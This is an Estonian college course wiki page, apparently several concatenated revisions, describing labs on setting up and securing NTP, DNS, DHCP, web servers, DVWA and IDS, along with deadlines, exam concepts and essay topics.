Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha [https://www.us-cert.gov/ncas/alerts/TA14-013A siin] kirjeldatud rünnet.

[[NTP Ubuntus]]

===Labor 2 - DNS seadistamine (6p/6%)===

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS Näitelahendus 1]

[[Nimeserveri labor V.2| DNS Näitelahendus 2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

===Labor 3 - DHCP seadistamine (6p/6%)===
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

===Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)===
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimed peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

===Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)===

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme Wordpress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

Wordpress paigaldamine ja jõudluse testimine (varnish)
*[https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1 Wordpress paigaldamine]
**[[WordPress turvamine| Wordpress turvamine]]
**[http://wpdevshed.com/top-cache-plugins-wordpress/ Wordpress caching plugins]
**[[Varnish]]
***[[Apache logide seadistus]]

===Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)===

Paigaldage [[DVWA]].

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

===Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)===

===Labor 8 - IDS (10p/10%)===

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

[[IDS_Systeemid_-_Labor_1| IDS Näitelahendus]]

[[Suricata| Abistav materjal]]

===Questid, millede eest saab punkte===

[https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing Quest 1 (Läbi ja tehtud)]

==Esitatud referaadid==
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

==Juurteenuste kursus==
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

==Täiendav lugemismaterjal==
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

==Vanad loengumaterjalid==

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-31T20:46:36Z

Mernits: /* Referaadi teemad 2015 */

=Üldinfo=

Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==

Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=

Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=

Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=

[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi

<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;
</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

=Referaadi teemad 2015=

*[[aptly]] -- http://www.aptly.info/
*[[dnf]] -- DNF package manager
*[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameetrid
*[[sqlmap]]
*[[Kippo SSH Honeypot]]
*[[p0f]] http://tools.kali.org/information-gathering/p0f
*[[hping]] http://www.hping.org/
*[[Yersinia]] - http://www.yersinia.net/
*[[WPScan]] - http://wpscan.org/
*[[Aircrack]]
*[[ntop]]
*[[Nikto]]
*[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>
*[[DigiNotar]]
*[[Ipkungfu Tulemüür]]
*[[iodine]]
*[[fabric]]
*[[mpstat]]
*[[arpwatch]]
*[[ss]]
*[[glances]]
*[[mod_status]]
*[[smoothwall]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
nano /etc/network/interfaces
<pre>
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</pre>

Taaskäivitage võrguliides '''eth1'''

ifdown eth1 && ifup eth1

Muutke DNS serveril hostinimi ns.sinudomeen.

echo ns > /etc/hostname

Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

Käivitage teenus '''hostname'''

service hostname start

Korraldus hostname -f peab tagastama FQDN-i

hostname -f

Seadistage ka [[OpenSSH:_võtmetega_autentimine| võtmetepõhine autentimine]].

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==

Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha [https://www.us-cert.gov/ncas/alerts/TA14-013A siin] kirjeldatud rünnet.

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS Näitelahendus 1]

[[Nimeserveri labor V.2| DNS Näitelahendus 2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimed peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme Wordpress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

Wordpress paigaldamine ja jõudluse testimine (varnish)
*[https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1 Wordpress paigaldamine]
**[[WordPress turvamine| Wordpress turvamine]]
**[http://wpdevshed.com/top-cache-plugins-wordpress/ Wordpress caching plugins]
**[[Varnish]]
***[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage [[DVWA]].

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

[[IDS_Systeemid_-_Labor_1| IDS Näitelahendus]]

[[Suricata| Abistav materjal]]

==Questid, millede eest saab punkte==

[https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing Quest 1 (Läbi ja tehtud)]

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-31T13:15:28Z

Mernits: /* Referaadi teemad 2015 */

=Üldinfo=

Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==

Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=

Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=

Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=

[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi

<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;
</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

=Referaadi teemad 2015=

*[[dnf]] -- DNF package manager
*[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameetrid
